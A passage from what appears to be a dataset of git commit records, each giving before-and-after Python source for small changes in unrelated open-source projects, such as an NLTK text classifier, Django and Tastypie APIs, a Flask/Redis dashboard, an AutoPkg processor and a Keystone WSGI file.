from hoomd.simulation import Simulation
from hoomd.state import State
from hoomd.operations import Operations
from hoomd.snapshot import Snapshot
from hoomd.logger import Logger
from hoomd import tuner
from hoomd._hoomd import WalltimeLimitReached;
_default_excepthook = sys.excepthook;
## \internal
# \brief Override pythons except hook to abort MPI runs
def _hoomd_sys_excepthook(type, value, traceback):
_default_excepthook(type, value, traceback);
sys.stderr.flush();
if context.current.device is not None:
_hoomd.abort_mpi(context.current.device.cpp_exec_conf);
sys.excepthook = _hoomd_sys_excepthook
__version__ = "{0}.{1}.{2}".format(*_hoomd.__version__)
| bsd-3-clause | Python |
c7ecf728e12dd3a59f4ef45e30b61ce5c52ceca5 | Fix corpus to Polish language | dhermyt/WONS | analysis/textclassification/bagofwords.py | analysis/textclassification/bagofwords.py | import functools
from nltk import ngrams
from nltk.collocations import BigramCollocationFinder
from nltk.metrics import BigramAssocMeasures
import nltk.corpus
import re
import definitions
INVALID_TOKEN_PATTERN = r'^[!%"%\*\(\)\+,&#-\.\$/\d:;\?\<\>\=@\[\]].*'
NEGATION_TOKEN_PATTERN = r'^nie$'
def get_stopwords_list():
return list(nltk.corpus.stopwords.words('polish'))
def filter_stopwords(words):
polish_stopwords = get_stopwords_list()
return [w for w in words if w not in polish_stopwords]
def filter_custom_set(words, custom_set):
r = re.compile(custom_set)
words = list(filter(lambda w: not r.match(w), words))
return words
def include_significant_bigrams(words, score_fn=BigramAssocMeasures.likelihood_ratio, n=100):
bigram_finder = BigramCollocationFinder.from_words(words)
bigrams = bigram_finder.nbest(score_fn, n)
return list(words + bigrams)
def get_all_lowercase(words):
return [x.lower() for x in words]
def get_bag_of_words(words):
return dict([(word, True) for word in words])
def mark_negations(words):
add_negation_suffix = False
r_negation = re.compile(NEGATION_TOKEN_PATTERN)
r_stopword = re.compile(INVALID_TOKEN_PATTERN)
for index, item in enumerate(words):
if (r_stopword.match(item)):
add_negation_suffix = False
continue
if (r_negation.match(item)):
add_negation_suffix = True
continue
if (add_negation_suffix):
words[index] = words[index] + "_NEG"
return words
def get_processed_bag_of_words(text, lemmatizer, settings):
words = nltk.tokenize.word_tokenize(text, 'polish')
words = get_all_lowercase(words)
if lemmatizer is not None:
words = [lemmatizer.get_lemma(word) for word in words]
if (settings.FILTER_STOPWORDS):
words = filter_stopwords(words)
words = mark_negations(words)
words = filter_custom_set(words, INVALID_TOKEN_PATTERN)
if settings.MAX_FEATURES > 0:
words = words[:settings.MAX_FEATURES]
words = functools.reduce(lambda x, y: x + y,
[words if n == 1 else list([' '.join(ngram) for ngram in ngrams(words, n)]) for n in
range(1, settings.MAX_NGRAMS + 1)])
return get_bag_of_words(words)
| import functools
from nltk import ngrams
from nltk.collocations import BigramCollocationFinder
from nltk.metrics import BigramAssocMeasures
import nltk.corpus
import re
import definitions
INVALID_TOKEN_PATTERN = r'^[!%"%\*\(\)\+,&#-\.\$/\d:;\?\<\>\=@\[\]].*'
NEGATION_TOKEN_PATTERN = r'^nie$'
def get_stopwords_list():
return list(nltk.corpus.stopwords.words('polish'))
def filter_stopwords(words):
polish_stopwords = get_stopwords_list()
return [w for w in words if w not in polish_stopwords]
def filter_custom_set(words, custom_set):
r = re.compile(custom_set)
words = list(filter(lambda w: not r.match(w), words))
return words
def include_significant_bigrams(words, score_fn=BigramAssocMeasures.likelihood_ratio, n=100):
bigram_finder = BigramCollocationFinder.from_words(words)
bigrams = bigram_finder.nbest(score_fn, n)
return list(words + bigrams)
def get_all_lowercase(words):
return [x.lower() for x in words]
def get_bag_of_words(words):
return dict([(word, True) for word in words])
def mark_negations(words):
add_negation_suffix = False
r_negation = re.compile(NEGATION_TOKEN_PATTERN)
r_stopword = re.compile(INVALID_TOKEN_PATTERN)
for index, item in enumerate(words):
if (r_stopword.match(item)):
add_negation_suffix = False
continue
if (r_negation.match(item)):
add_negation_suffix = True
continue
if (add_negation_suffix):
words[index] = words[index] + "_NEG"
return words
def get_processed_bag_of_words(text, lemmatizer, settings):
words = nltk.tokenize.word_tokenize(text)
words = get_all_lowercase(words)
if lemmatizer is not None:
words = [lemmatizer.get_lemma(word) for word in words]
if (settings.FILTER_STOPWORDS):
words = filter_stopwords(words)
words = mark_negations(words)
words = filter_custom_set(words, INVALID_TOKEN_PATTERN)
if settings.MAX_FEATURES > 0:
words = words[:settings.MAX_FEATURES]
words = functools.reduce(lambda x, y: x + y,
[words if n == 1 else list([' '.join(ngram) for ngram in ngrams(words, n)]) for n in
range(1, settings.MAX_NGRAMS + 1)])
return get_bag_of_words(words)
| bsd-2-clause | Python |
de027652a4bb12c6d1a4cb7bc85448c8c2a0d321 | use argparse to get arguments from command line | natemara/sortroms | sortroms/__main__.py | sortroms/__main__.py | from sortroms import main
import argparse
parser = argparse.ArgumentParser(
description='Sort emulator ROM files',
prog='sortroms'
)
parser.add_argument(
'folder',
metavar='DIR',
type=str,
nargs='?',
help='The ROM folder to sort.'
)
if __name__ == '__main__':
args = parser.parse_args()
main(args)
| from sortroms import main
if __name__ == '__main__':
main()
| mit | Python |
19d81520a7fe9dd8098bd1603b455f08e465c5f7 | add getspire to init | stargaser/herschel-archive | hsadownload/__init__.py | hsadownload/__init__.py |
__all__ = ['access', 'getpacs', 'getspire']
from hsadownload import access, getpacs, getspire
|
__all__ = ['access', 'getpacs']
from hsadownload import access, getpacs
| bsd-3-clause | Python |
54b40488a7b0baefba3ada33cf9b792af1c2ca4d | fix bug with api v1 | Fresnoy/kart,Fresnoy/kart | people/api.py | people/api.py | # -*- coding: utf-8 -*-
from django.contrib.auth.models import User
from tastypie import fields
from tastypie.resources import ModelResource, ALL, ALL_WITH_RELATIONS
from common.api import WebsiteResource
from .models import Artist, Staff, Organization
class UserResource(ModelResource):
class Meta:
queryset = User.objects.exclude(pk=-1) # Exclude anonymous user
detail_uri_name = 'username'
resource_name = 'people/user'
fields = ['username', 'first_name', 'last_name', 'id']
filtering = {
'first_name': ALL,
'last_name': ALL
}
def dehydrate(self, bundle):
if hasattr(bundle.obj, 'profile'):
bundle.data['photo'] = bundle.obj.profile.photo
bundle.data['birthdate'] = bundle.obj.profile.birthdate
bundle.data['birthplace'] = bundle.obj.profile.birthplace
bundle.data['cursus'] = bundle.obj.profile.cursus
bundle.data['gender'] = bundle.obj.profile.gender
# Nationality : country code separated by commas
bundle.data['nationality'] = bundle.obj.profile.nationality
bundle.data['homeland_country'] = bundle.obj.profile.homeland_country
bundle.data['birthplace_country'] = bundle.obj.profile.birthplace_country
return bundle
class ArtistResource(ModelResource):
class Meta:
queryset = Artist.objects.all()
resource_name = 'people/artist'
filtering = {
'user': ALL_WITH_RELATIONS,
'resource_uri': ALL
}
fields = ['id', 'nickname', 'bio_short_fr', 'bio_short_en',
'bio_fr', 'bio_en', 'twitter_account', 'facebook_profile']
websites = fields.ToManyField(WebsiteResource, 'websites', full=True)
user = fields.ForeignKey(UserResource, 'user', full=True)
artworks = fields.ToManyField('production.api.ArtworkResource', 'artworks',
full=False, null=True, use_in=['detail'])
class StaffResource(ModelResource):
class Meta:
queryset = Staff.objects.all()
resource_name = 'people/staff'
fields = ('user',)
user = fields.ForeignKey(UserResource, 'user', full=True)
class OrganizationResource(ModelResource):
class Meta:
queryset = Organization.objects.all()
resource_name = 'people/organization'
| # -*- coding: utf-8 -*-
from django.contrib.auth.models import User
from tastypie import fields
from tastypie.resources import ModelResource, ALL, ALL_WITH_RELATIONS
from common.api import WebsiteResource
from .models import Artist, Staff, Organization
class UserResource(ModelResource):
class Meta:
queryset = User.objects.exclude(pk=-1) # Exclude anonymous user
detail_uri_name = 'username'
resource_name = 'people/user'
fields = ['username', 'first_name', 'last_name', 'id']
filtering = {
'first_name': ALL,
'last_name': ALL
}
def dehydrate(self, bundle):
bundle.data['photo'] = bundle.obj.profile.photo
bundle.data['birthdate'] = bundle.obj.profile.birthdate
bundle.data['birthplace'] = bundle.obj.profile.birthplace
bundle.data['cursus'] = bundle.obj.profile.cursus
bundle.data['gender'] = bundle.obj.profile.gender
# Nationality : country code separated by commas
bundle.data['nationality'] = bundle.obj.profile.nationality
bundle.data['homeland_country'] = bundle.obj.profile.homeland_country
bundle.data['birthplace_country'] = bundle.obj.profile.birthplace_country
return bundle
class ArtistResource(ModelResource):
class Meta:
queryset = Artist.objects.all()
resource_name = 'people/artist'
filtering = {
'user': ALL_WITH_RELATIONS,
'resource_uri': ALL
}
fields = ['id', 'nickname', 'bio_short_fr', 'bio_short_en',
'bio_fr', 'bio_en', 'twitter_account', 'facebook_profile']
websites = fields.ToManyField(WebsiteResource, 'websites', full=True)
user = fields.ForeignKey(UserResource, 'user', full=True)
artworks = fields.ToManyField('production.api.ArtworkResource', 'artworks',
full=False, null=True, use_in=['detail'])
class StaffResource(ModelResource):
class Meta:
queryset = Staff.objects.all()
resource_name = 'people/staff'
fields = ('user',)
user = fields.ForeignKey(UserResource, 'user', full=True)
class OrganizationResource(ModelResource):
class Meta:
queryset = Organization.objects.all()
resource_name = 'people/organization'
| agpl-3.0 | Python |
59b2d0418c787066c37904816925dad15b0b45cf | Use author display name in document list_filter | yourcelf/btb,yourcelf/btb,flexpeace/btb,flexpeace/btb,yourcelf/btb,flexpeace/btb,flexpeace/btb,yourcelf/btb,flexpeace/btb,yourcelf/btb | scanblog/scanning/admin.py | scanblog/scanning/admin.py | from django.contrib import admin
from scanning.models import PendingScan, Document, DocumentPage, Scan, ScanPage, Transcription
class ScanPageInline(admin.TabularInline):
model = ScanPage
class ScanAdmin(admin.ModelAdmin):
model = Scan
inlines = [ScanPageInline]
admin.site.register(Scan, ScanAdmin)
class PendingScanAdmin(admin.ModelAdmin):
model = PendingScan
list_display = ('author', 'editor', 'code', 'created', 'completed')
search_fields = ('code',)
admin.site.register(PendingScan, PendingScanAdmin)
class DocumentAdmin(admin.ModelAdmin):
list_display = ['title', 'author', 'status', 'created']
search_fields = ['title', 'author__profile__display_name',
'body', 'transcription__revisions__body']
date_hierarchy = 'created'
list_filter = ['type', 'status', 'author__profile__managed',
'author__profile__display_name']
admin.site.register(Document, DocumentAdmin)
admin.site.register(DocumentPage)
admin.site.register(Transcription)
| from django.contrib import admin
from scanning.models import PendingScan, Document, DocumentPage, Scan, ScanPage, Transcription
class ScanPageInline(admin.TabularInline):
model = ScanPage
class ScanAdmin(admin.ModelAdmin):
model = Scan
inlines = [ScanPageInline]
admin.site.register(Scan, ScanAdmin)
class PendingScanAdmin(admin.ModelAdmin):
model = PendingScan
list_display = ('author', 'editor', 'code', 'created', 'completed')
search_fields = ('code',)
admin.site.register(PendingScan, PendingScanAdmin)
class DocumentAdmin(admin.ModelAdmin):
list_display = ['title', 'author', 'status', 'created']
search_fields = ['title', 'author__profile__display_name',
'body', 'transcription__revisions__body']
date_hierarchy = 'created'
list_filter = ['type', 'status', 'author', 'author__profile__managed']
admin.site.register(Document, DocumentAdmin)
admin.site.register(DocumentPage)
admin.site.register(Transcription)
| agpl-3.0 | Python |
3bc11eea2d629b316eb9a8bdf4d9c2a2c801ddf5 | Remove unused imports | konefalg/whylog,andrzejgorski/whylog,9livesdata/whylog,kgromadzki/whylog,epawlowska/whylog,9livesdata/whylog,epawlowska/whylog,kgromadzki/whylog,konefalg/whylog,andrzejgorski/whylog | whylog/tests/tests_front/tests_whylog_factory.py | whylog/tests/tests_front/tests_whylog_factory.py | from whylog.config.investigation_plan import LineSource
from whylog.front.whylog_factory import whylog_factory
from whylog.front.utils import FrontInput
from whylog.tests.utils import TestRemovingSettings
class TestWhylogFactory(TestRemovingSettings):
def tests_whylog_factory(self):
log_reader, teacher_generator = whylog_factory()
teacher = teacher_generator()
front_input = FrontInput(1, 'line content', LineSource('host', 'path'))
log_reader.get_causes(front_input)
teacher.add_line(0, front_input, True)
| from whylog.config.investigation_plan import LineSource
from whylog.front.whylog_factory import whylog_factory
from whylog.front.utils import FrontInput
from whylog.log_reader import LogReader
from whylog.teacher import Teacher
from whylog.tests.utils import TestRemovingSettings
class TestWhylogFactory(TestRemovingSettings):
def tests_whylog_factory(self):
log_reader, teacher_generator = whylog_factory()
teacher = teacher_generator()
front_input = FrontInput(1, 'line content', LineSource('host', 'path'))
log_reader.get_causes(front_input)
teacher.add_line(0, front_input, True)
| bsd-3-clause | Python |
b875084e74ee03c6b251a79f04f0db340bb356b8 | Fix #604 | Clinical-Genomics/scout,Clinical-Genomics/scout,Clinical-Genomics/scout | scout/constants/indexes.py | scout/constants/indexes.py | from pymongo import (IndexModel, ASCENDING, DESCENDING)
INDEXES = {
'hgnc_collection': [
IndexModel([
('build', ASCENDING),
('chromosome', ASCENDING)],
name="build_chromosome"),
],
'variant_collection': [
IndexModel([
('case_id', ASCENDING),
('rank_score', DESCENDING)],
name="caseid_rankscore"),
IndexModel([
('case_id', ASCENDING),
('variant_rank', ASCENDING)],
name="caseid_variantrank"),
IndexModel([
('case_id', ASCENDING),
('category', ASCENDING),
('variant_type', ASCENDING),
('rank_score', DESCENDING)],
name="caseid_category_varianttype_rankscore"),
IndexModel([
('case_id', ASCENDING),
('variant_id', ASCENDING)],
name="caseid_variantid"),
IndexModel([
('case_id', ASCENDING),
('variant_type', ASCENDING),
('variant_rank', ASCENDING),
('panels', ASCENDING),
('thousand_genomes_frequency', ASCENDING)],
name="caseid_varianttype_variantrank_panels_thousandg")
],
}
| from pymongo import (IndexModel, ASCENDING, DESCENDING)
INDEXES = {
'hgnc_collection': [IndexModel(
[('build', ASCENDING), ('chromosome', ASCENDING)], name="build_chromosome"),
],
'variant_collection': [
IndexModel([('case_id', ASCENDING),('rank_score', DESCENDING)], name="caseid_rankscore"),
IndexModel([('case_id', ASCENDING),('variant_rank', ASCENDING)], name="caseid_variantrank")
]
}
| bsd-3-clause | Python |
87371774ad332a3adbe927e2609d73710f4a7678 | change method name | vangj/py-bbn,vangj/py-bbn | tests/graph/test_dag.py | tests/graph/test_dag.py | from pybbn.graph.edge import Edge, EdgeType
from pybbn.graph.node import Node
from pybbn.graph.dag import Dag
from nose import with_setup
def setup():
pass
def teardown():
pass
@with_setup(setup, teardown)
def test_dag_creation():
n0 = Node(0)
n1 = Node(1)
n2 = Node(2)
e0 = Edge(n0, n1, EdgeType.DIRECTED)
e1 = Edge(n1, n2, EdgeType.DIRECTED)
e2 = Edge(n2, n0, EdgeType.DIRECTED)
g = Dag()
g.add_node(n0)
g.add_node(n1)
g.add_edge(e0)
g.add_edge(e1)
g.add_edge(e2)
print(g)
assert len(g.get_nodes()) == 3
assert len(g.get_edges()) == 2
assert len(list(g.get_neighbors(0))) == 1
assert len(list(g.get_neighbors(1))) == 2
assert len(list(g.get_neighbors(2))) == 1
assert 1 in g.get_neighbors(0)
assert 0 in g.get_neighbors(1)
assert 2 in g.get_neighbors(1)
assert 1 in g.get_neighbors(2)
assert g.edge_exists(0, 1) == 1
assert g.edge_exists(1, 2) == 1
assert g.edge_exists(0, 2) == 0
assert len(g.get_parents(0)) == 0
assert len(g.get_parents(1)) == 1
assert len(g.get_parents(2)) == 1
assert 0 in g.get_parents(1)
assert 1 in g.get_parents(2)
assert len(g.get_children(0)) == 1
assert len(g.get_children(1)) == 1
assert len(g.get_children(2)) == 0
assert 1 in g.get_children(0)
assert 2 in g.get_children(1)
| from pybbn.graph.edge import Edge, EdgeType
from pybbn.graph.node import Node
from pybbn.graph.dag import Dag
from nose import with_setup
def setup():
pass
def teardown():
pass
@with_setup(setup, teardown)
def test_graph_creation():
n0 = Node(0)
n1 = Node(1)
n2 = Node(2)
e0 = Edge(n0, n1, EdgeType.DIRECTED)
e1 = Edge(n1, n2, EdgeType.DIRECTED)
e2 = Edge(n2, n0, EdgeType.DIRECTED)
g = Dag()
g.add_node(n0)
g.add_node(n1)
g.add_edge(e0)
g.add_edge(e1)
g.add_edge(e2)
print(g)
assert len(g.get_nodes()) == 3
assert len(g.get_edges()) == 2
assert len(list(g.get_neighbors(0))) == 1
assert len(list(g.get_neighbors(1))) == 2
assert len(list(g.get_neighbors(2))) == 1
assert 1 in g.get_neighbors(0)
assert 0 in g.get_neighbors(1)
assert 2 in g.get_neighbors(1)
assert 1 in g.get_neighbors(2)
assert g.edge_exists(0, 1) == 1
assert g.edge_exists(1, 2) == 1
assert g.edge_exists(0, 2) == 0
assert len(g.get_parents(0)) == 0
assert len(g.get_parents(1)) == 1
assert len(g.get_parents(2)) == 1
assert 0 in g.get_parents(1)
assert 1 in g.get_parents(2)
assert len(g.get_children(0)) == 1
assert len(g.get_children(1)) == 1
assert len(g.get_children(2)) == 0
assert 1 in g.get_children(0)
assert 2 in g.get_children(1)
| apache-2.0 | Python |
e4e10ee0ae5a18cfec0e15b7b85986b7f4fc4f9d | Fix prefetched fields in Institutions in API | watchdogpolska/feder,watchdogpolska/feder,watchdogpolska/feder,watchdogpolska/feder | feder/institutions/viewsets.py | feder/institutions/viewsets.py | import django_filters
from rest_framework import filters, viewsets
from teryt_tree.rest_framework_ext.viewsets import custom_area_filter
from .models import Institution, Tag
from .serializers import InstitutionSerializer, TagSerializer
class InstitutionFilter(filters.FilterSet):
jst = django_filters.CharFilter(method=custom_area_filter)
def __init__(self, *args, **kwargs):
super(InstitutionFilter, self).__init__(*args, **kwargs)
self.filters['name'].lookup_expr = 'icontains'
class Meta:
model = Institution
fields = ['name', 'tags', 'jst', 'regon']
class InstitutionViewSet(viewsets.ModelViewSet):
queryset = (Institution.objects.
select_related('jst').
prefetch_related('tags','parents').
all())
serializer_class = InstitutionSerializer
filter_backends = (filters.DjangoFilterBackend,)
filter_class = InstitutionFilter
class TagViewSet(viewsets.ModelViewSet):
queryset = Tag.objects.all()
serializer_class = TagSerializer
| import django_filters
from rest_framework import filters, viewsets
from teryt_tree.rest_framework_ext.viewsets import custom_area_filter
from .models import Institution, Tag
from .serializers import InstitutionSerializer, TagSerializer
class InstitutionFilter(filters.FilterSet):
jst = django_filters.CharFilter(method=custom_area_filter)
def __init__(self, *args, **kwargs):
super(InstitutionFilter, self).__init__(*args, **kwargs)
self.filters['name'].lookup_expr = 'icontains'
class Meta:
model = Institution
fields = ['name', 'tags', 'jst', 'regon']
class InstitutionViewSet(viewsets.ModelViewSet):
queryset = (Institution.objects.
select_related('jst').
prefetch_related('tags').
all())
serializer_class = InstitutionSerializer
filter_backends = (filters.DjangoFilterBackend,)
filter_class = InstitutionFilter
class TagViewSet(viewsets.ModelViewSet):
queryset = Tag.objects.all()
serializer_class = TagSerializer
| mit | Python |
9bdaf963843a9f0b44487ea3b258b50b328153d8 | Remove redis connection logic from each view, make it global, keep it threadsafe | gmcquillan/firetower,gmcquillan/firetower | firetower/web/firetower_web.py | firetower/web/firetower_web.py | from calendar import timegm
import datetime
import time
from flask import Flask, render_template
from firetower import redis_util
REDIS_HOST = "localhost"
REDIS_PORT = 6379
REDIS = redis_util.Redis(REDIS_HOST, REDIS_PORT)
app = Flask(__name__)
def timestamp(dttm):
return timegm(dttm.utctimetuple())
@app.route("/")
def root():
lines = []
categories = REDIS.get_categories()
for cat in categories:
lines.append("<li>%s</li>" % cat)
return "<ul>%s</ul>" % "\n".join(lines)
@app.route("/default/")
def default():
cat_dict = REDIS.conn.hgetall("category_ids")
end = datetime.datetime.now()
start = end - datetime.timedelta(hours=1)
results = []
for cat_id in cat_dict:
cat = cat_dict[cat_id]
time_series = REDIS.get_timeseries(cat, timestamp(start), timestamp(end))
items = [(int(x)*1000, int(y)) for x,y in time_series.items()]
items.sort(lambda x,y: cmp(x[0], y[0]))
results.append(
(cat_id, cat, items)
)
return render_template(
"last_5_index.html", categories = cat_dict.items(), results = results
)
@app.route("/aggregate")
def aggregate():
cat_dict = REDIS.conn.hgetall("category_ids")
start = end - 300
error_totals = {}
for cat_id in cat_dict:
cat = cat_dict[cat_id]
time_series = REDIS.get_timeseries(cat, start, end)
for time_point in time_series:
error_totals[cat_id] = error_totals.get(cat_id, 0) + int(time_point[1])
totals = []
print error_totals
for i in error_totals.items():
totals.append((i[0], cat_dict[i[0]], i[1]))
return render_template(
"aggregate.html", totals = totals)
def main():
app.run(debug=True, use_evalex=False, host='0.0.0.0')
| from calendar import timegm
import datetime
import time
from flask import Flask, render_template
from firetower import redis_util
REDIS_HOST = "localhost"
REDIS_PORT = 6379
app = Flask(__name__)
def timestamp(dttm):
return timegm(dttm.utctimetuple())
@app.route("/")
def root():
lines = []
redis = redis_util.Redis(REDIS_HOST, REDIS_PORT)
categories = redis.get_categories()
for cat in categories:
lines.append("<li>%s</li>" % cat)
return "<ul>%s</ul>" % "\n".join(lines)
@app.route("/default/")
def default():
redis = redis_util.Redis(REDIS_HOST, REDIS_PORT)
cat_dict = redis.conn.hgetall("category_ids")
end = datetime.datetime.now()
start = end - datetime.timedelta(hours=1)
results = []
for cat_id in cat_dict:
cat = cat_dict[cat_id]
time_series = redis.get_timeseries(cat, timestamp(start), timestamp(end))
items = [(int(x)*1000, int(y)) for x,y in time_series.items()]
items.sort(lambda x,y: cmp(x[0], y[0]))
results.append(
(cat_id, cat, items)
)
return render_template(
"last_5_index.html", categories = cat_dict.items(), results = results
)
@app.route("/aggregate")
def aggregate():
redis = redis_util.Redis(REDIS_HOST, REDIS_PORT)
cat_dict = redis.conn.hgetall("category_ids")
start = end - 300
error_totals = {}
for cat_id in cat_dict:
cat = cat_dict[cat_id]
time_series = redis.get_timeseries(cat, start, end)
for time_point in time_series:
error_totals[cat_id] = error_totals.get(cat_id, 0) + int(time_point[1])
totals = []
print error_totals
for i in error_totals.items():
totals.append((i[0], cat_dict[i[0]], i[1]))
return render_template(
"aggregate.html", totals = totals)
def main():
app.run(debug=True, use_evalex=False, host='0.0.0.0')
| mit | Python |
1c48f9ad2c2a66d7c15c9216665b7f802d3498b4 | Set deprecation_summary_result so we can summarize deprecations and they get written to the report plist if specified. | autopkg/gregneagle-recipes | SharedProcessors/DeprecationWarning.py | SharedProcessors/DeprecationWarning.py | #!/usr/bin/python
#
# Copyright 2019 Greg Neagle
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Processor that outputs a warning message. Intended to alert recipe users of
upcoming removal of a recipe."""
import os
from autopkglib import Processor
__all__ = ["DeprecationWarning"]
class DeprecationWarning(Processor):
"""This processor outputs a warning that the recipe has been deprecated."""
input_variables = {
"warning_message": {
"required": False,
"description": "Warning message to output.",
},
}
output_variables = {
"deprecation_summary_result": {
"description": "Description of interesting results."
}
}
description = __doc__
def main(self):
warning_message = self.env.get(
"warning_message",
"### This recipe has been deprecated. It may be removed soon. ###"
)
self.output(warning_message)
recipe_name = os.path.basename(self.env['RECIPE_PATH'])
if recipe_name.endswith('.recipe'):
recipe_name = os.path.splitext(recipe_name)[0]
self.env["deprecation_summary_result"] = {
'summary_text': 'The following recipes have deprecation warnings:',
'report_fields': ['name', 'warning'],
'data': {
'name': recipe_name,
'warning': warning_message
}
}
if __name__ == '__main__':
PROCESSOR = DeprecationWarning()
PROCESSOR.execute_shell()
| #!/usr/bin/python
#
# Copyright 2019 Greg Neagle
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Processor that outputs a warning message. Intended to alert recipe users of
upcoming removal of a recipe."""
from autopkglib import Processor
__all__ = ["DeprecationWarning"]
class DeprecationWarning(Processor):
"""This processor outputs a warning that the recipe has been deprecated."""
input_variables = {
"warning_message": {
"required": False,
"description": "Warning message to output.",
},
}
output_variables = {
}
description = __doc__
def main(self):
warning_message = self.env.get(
"warning_message",
"### This recipe has been deprecated. It may be removed soon. ###"
)
self.output(warning_message, verbose_level=0)
if __name__ == '__main__':
PROCESSOR = DeprecationWarning()
PROCESSOR.execute_shell()
| apache-2.0 | Python |
1e139567767a98914df90ec152d543bb8bfde38c | add test | dtnewman/zappa_boilerplate,dtnewman/zappa_boilerplate | basic_zappa_project/public/views_tests.py | basic_zappa_project/public/views_tests.py | from basic_zappa_project.test_utils import BaseTestCase
class TestViews(BaseTestCase):
def test_status(self):
expected = {'status': 'ok'}
response = self.client.get('/status')
self.assert200(response)
self.assertEqual(response.json, expected)
def test_about(self):
response = self.client.get('/about')
self.assert200(response)
def test_home_get(self):
response = self.client.get('/')
self.assert200(response)
def test_register_get(self):
response = self.client.get('/register')
self.assert200(response)
| from basic_zappa_project.test_utils import BaseTestCase
class TestViews(BaseTestCase):
def test_status(self):
expected = {'status': 'ok'}
response = self.client.get('/status')
self.assert200(response)
self.assertEqual(response.json, expected)
def test_about(self):
response = self.client.get('/about')
self.assert200(response)
def test_home_get(self):
response = self.client.get('/')
self.assert200(response)
| mit | Python |
a82fc92938a647de620cf8a96fd5907c08060c32 | fix mistake | sagemathinc/learntheeasyway,sagemathinc/learntheeasyway,sagemathinc/learntheeasyway,sagemathinc/learntheeasyway | scripts/install/install.py | scripts/install/install.py | import os
import subprocess
import os.path
def apt_get_install(fname):
with open(fname, 'r') as f:
items = f.readlines()
for item in items:
os.system('sudo apt-get install -y %s' % (item))
def npm_global_install(fname):
with open(fname, 'r') as f:
items = f.readlines()
for item in items:
os.system('sudo npm -g install %s' % (item))
def pip_install(fname):
with open(fname, 'r') as f:
items = f.readlines()
for item in items:
os.system('sudo pip install %s' % (item))
def cmd_exists(cmd):
# this is from http://stackoverflow.com/questions/377017/test-if-executable-exists-in-python
return subprocess.call("type " + cmd, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
functions_to_handle_requirements = {}
functions_to_handle_requirements['apt_get'] = apt_get_install
functions_to_handle_requirements['npm'] = npm_global_install
functions_to_handle_requirements['pip'] = pip_install
order_of_files_to_handle = ['apt_get_requirements.txt', 'npm_requirements.txt', 'pip_requirements.txt']
for fname in order_of_files_to_handle:
if os.path.isfile(fname):
# assume fname endswith _requirements.txt
l = len('_requirements.txt')
fname_first_part = fname[:-l]
functions_to_handle_requirements[fname_first_part](fname) | import os
import subprocess
import os.path
def apt_get_install(what):
with open(fname, 'r') as f:
items = f.readlines()
for item in items:
os.system('sudo apt-get install -y %s' % (item))
def npm_global_install(what):
with open(fname, 'r') as f:
items = f.readlines()
for item in items:
os.system('sudo npm -g install %s' % (item))
def pip_install(what):
with open(fname, 'r') as f:
items = f.readlines()
for item in items:
os.system('sudo pip install %s' % (item))
def cmd_exists(cmd):
# this is from http://stackoverflow.com/questions/377017/test-if-executable-exists-in-python
return subprocess.call("type " + cmd, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
functions_to_handle_requirements = {}
functions_to_handle_requirements['apt_get'] = apt_get_install
functions_to_handle_requirements['npm'] = npm_global_install
functions_to_handle_requirements['pip'] = pip_install
order_of_files_to_handle = ['apt_get_requirements.txt', 'npm_requirements.txt', 'pip_requirements.txt']
for fname in order_of_files_to_handle:
if os.path.isfile(fname):
# assume fname endswith _requirements.txt
l = len('_requirements.txt')
fname_first_part = fname[:-l]
functions_to_handle_requirements[fname_first_part](fname) | apache-2.0 | Python |
19c0e8d856049677bc7de2bc293a87a0aac306f8 | Fix wsgi config file access for HTTPD | ging/keystone,cloudbau/keystone,cloudbau/keystone,JioCloud/keystone,townbull/keystone-dtrust,roopali8/keystone,maestro-hybrid-cloud/keystone,townbull/keystone-dtrust,rickerc/keystone_audit,rickerc/keystone_audit,jumpstarter-io/keystone,cloudbau/keystone,jamielennox/keystone,cbrucks/Federated_Keystone,jumpstarter-io/keystone,takeshineshiro/keystone,himanshu-setia/keystone,derekchiang/keystone,maestro-hybrid-cloud/keystone,reeshupatel/demo,idjaw/keystone,derekchiang/keystone,cernops/keystone,dstanek/keystone,citrix-openstack-build/keystone,rickerc/keystone_audit,dsiddharth/access-keys,himanshu-setia/keystone,kwss/keystone,takeshineshiro/keystone,dstanek/keystone,openstack/keystone,blueboxgroup/keystone,jumpstarter-io/keystone,JioCloud/keystone,dstanek/keystone,vivekdhayaal/keystone,reeshupatel/demo,MaheshIBM/keystone,jamielennox/keystone,mahak/keystone,rushiagr/keystone,rodrigods/keystone,ajayaa/keystone,rushiagr/keystone,idjaw/keystone,blueboxgroup/keystone,promptworks/keystone,ntt-sic/keystone,reeshupatel/demo,kwss/keystone,nuxeh/keystone,dims/keystone,nuxeh/keystone,citrix-openstack-build/keystone,rajalokan/keystone,mahak/keystone,ilay09/keystone,klmitch/keystone,ntt-sic/keystone,ilay09/keystone,dims/keystone,rajalokan/keystone,ging/keystone,dsiddharth/access-keys,dsiddharth/access-keys,vivekdhayaal/keystone,ntt-sic/keystone,cbrucks/Federated_Keystone,rajalokan/keystone,rushiagr/keystone,mahak/keystone,promptworks/keystone,rodrigods/keystone,citrix-openstack-build/keystone,promptworks/keystone,ilay09/keystone,ajayaa/keystone,jonnary/keystone,kwss/keystone,MaheshIBM/keystone,nuxeh/keystone,vivekdhayaal/keystone,klmitch/keystone,openstack/keystone,openstack/keystone,townbull/keystone-dtrust,cbrucks/Federated_Keystone,derekchiang/keystone,UTSA-ICS/keystone-kerberos,roopali8/keystone,jonnary/keystone,cernops/keystone,UTSA-ICS/keystone-kerberos | httpd/keystone.py | httpd/keystone.py | import os
from paste import deploy
from keystone import config
from keystone.common import logging
LOG = logging.getLogger(__name__)
CONF = config.CONF
config_files = ['/etc/keystone/keystone.conf']
CONF(project='keystone', default_config_files=config_files)
